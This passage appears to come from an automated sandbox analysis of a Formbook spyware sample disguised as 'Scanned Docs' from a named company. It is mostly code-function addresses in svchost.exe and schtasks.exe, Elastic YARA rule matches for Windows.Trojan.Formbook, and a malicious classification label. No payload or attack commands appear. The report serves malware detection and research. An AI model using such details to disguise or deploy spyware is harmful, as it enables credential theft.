            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F01_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D003E61_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA3521_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC02C01_2_03CC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE02741_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF81CC1_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF41A21_2_03CF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D001AA1_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC81581_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C301001_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA1181_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD20001_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C01_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C647501_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C407701_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C6E01_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D005911_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C405351_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEE4F61_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF24461_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE44201_2_03CE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF6BD71_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB401_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA801_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A01_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0A9A61_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C569621_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E8F01_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C268B81_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4A8401_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428401_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32FC81_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBEFA01_2_03CBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4F401_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C82F281_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60F301_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE2F301_2_03CE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEEDB1_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52E901_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFCE931_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40E591_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEE261_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3ADE01_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C58DBF1_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4AD001_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDCD1F1_2_03CDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30CF21_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0CB51_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40C001_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8739A1_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2D34C1_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF132D1_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B2C01_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE12ED1_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5D2F01_2_03C5D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C452A01_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4B1B01_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7516C1_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2F1721_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0B16B1_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEF0CC1_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C470C01_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF70E91_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF0E01_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF7B01_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF16CC1_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C856301_2_03C85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D095C31_2_03D095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDD5B01_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF75711_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C314601_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF43F1_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB5BF01_2_03CB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7DBF91_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FB801_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFB761_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEDAC61_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDDAAC1_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85AA01_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE1AA31_2_03CE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFA491_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7A461_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB3A6C1_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C499501_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B9501_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD59101_2_03CD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C438E01_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAD8001_2_03CAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD21_2_03C03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD51_2_03C03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C41F921_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFFB11_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFF091_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C49EB01_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FDC01_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C43D401_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF1D5A1_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7D731_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFCF21_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB9C321_2_03CB9C32
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E9203E3_2_03E9203E
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E93FBE3_2_03E93FBE
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E9A6A93_2_03E9A6A9
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E9A6AE3_2_03E9A6AE
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03EB15BE3_2_03EB15BE
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E93D9E3_2_03E93D9E
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E93D963_2_03E93D96
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377A3524_2_0377A352
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036CE3F04_2_036CE3F0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037803E64_2_037803E6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037602744_2_03760274
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037402C04_2_037402C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037481584_2_03748158
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036B01004_2_036B0100
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0375A1184_2_0375A118
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037781CC4_2_037781CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037801AA4_2_037801AA
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037520004_2_03752000
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C07704_2_036C0770
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036E47504_2_036E4750
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036BC7C04_2_036BC7C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036DC6E04_2_036DC6E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C05354_2_036C0535
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037805914_2_03780591
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037724464_2_03772446
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037644204_2_03764420
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0376E4F64_2_0376E4F6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377AB404_2_0377AB40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03776BD74_2_03776BD7
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036BEA804_2_036BEA80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036D69624_2_036D6962
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C29A04_2_036C29A0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0378A9A64_2_0378A9A6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036CA8404_2_036CA840
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C28404_2_036C2840
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036EE8F04_2_036EE8F0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036A68B84_2_036A68B8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03734F404_2_03734F40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03762F304_2_03762F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03702F284_2_03702F28
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036E0F304_2_036E0F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036B2FC84_2_036B2FC8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0373EFA04_2_0373EFA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C0E594_2_036C0E59
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377EE264_2_0377EE26
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377EEDB4_2_0377EEDB
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377CE934_2_0377CE93
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036D2E904_2_036D2E90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0375CD1F4_2_0375CD1F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036CAD004_2_036CAD00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036BADE04_2_036BADE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036D8DBF4_2_036D8DBF
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C0C004_2_036C0C00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036B0CF24_2_036B0CF2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03760CB54_2_03760CB5
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036AD34C4_2_036AD34C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377132D4_2_0377132D
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0370739A4_2_0370739A
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037612ED4_2_037612ED
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036DD2F04_2_036DD2F0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036DB2C04_2_036DB2C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C52A04_2_036C52A0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F516C4_2_036F516C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0378B16B4_2_0378B16B
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036AF1724_2_036AF172
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036CB1B04_2_036CB1B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377F0E04_2_0377F0E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037770E94_2_037770E9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C70C04_2_036C70C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0376F0CC4_2_0376F0CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377F7B04_2_0377F7B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037716CC4_2_037716CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037775714_2_03777571
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0375D5B04_2_0375D5B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036B14604_2_036B1460
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377F43F4_2_0377F43F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377FB764_2_0377FB76
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03735BF04_2_03735BF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036FDBF94_2_036FDBF9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036DFB804_2_036DFB80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03733A6C4_2_03733A6C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03777A464_2_03777A46
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377FA494_2_0377FA49
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0376DAC64_2_0376DAC6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03705AA04_2_03705AA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03761AA34_2_03761AA3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0375DAAC4_2_0375DAAC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C99504_2_036C9950
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036DB9504_2_036DB950
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_037559104_2_03755910
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0372D8004_2_0372D800
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C38E04_2_036C38E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377FF094_2_0377FF09
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377FFB14_2_0377FFB1
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C1F924_2_036C1F92
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C9EB04_2_036C9EB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03777D734_2_03777D73
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036C3D404_2_036C3D40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03771D5A4_2_03771D5A
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036DFDC04_2_036DFDC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_03739C324_2_03739C32
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0377FCF24_2_0377FCF2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B216504_2_02B21650
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B3A0804_2_02B3A080
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B231704_2_02B23170
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B2316B4_2_02B2316B
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B1CA804_2_02B1CA80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B1AB004_2_02B1AB00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B1C8604_2_02B1C860
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B1C8584_2_02B1C858
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0332A2E34_2_0332A2E3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0332B0284_2_0332B028
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0332BB044_2_0332BB04
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0332BFBC4_2_0332BFBC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0332BC244_2_0332BC24
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: String function: 002A0A30 appears 46 times
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: String function: 0029F9F2 appears 31 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 0372EA12 appears 86 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 0373F290 appears 103 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 03707E54 appears 99 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 036F5130 appears 58 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 036AB970 appears 260 times
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1656099998.00000000039FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scanned Docs from Emnes Metal Sdn Bhd_.exe
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1656744327.00000000038A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scanned Docs from Emnes Metal Sdn Bhd_.exe
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/10
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F37B5 GetLastError,FormatMessageW,0_2_002F37B5
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002E10BF AdjustTokenPrivileges,CloseHandle,0_2_002E10BF
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_002E16C3
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_002F51CD
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_0030A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0030A67C
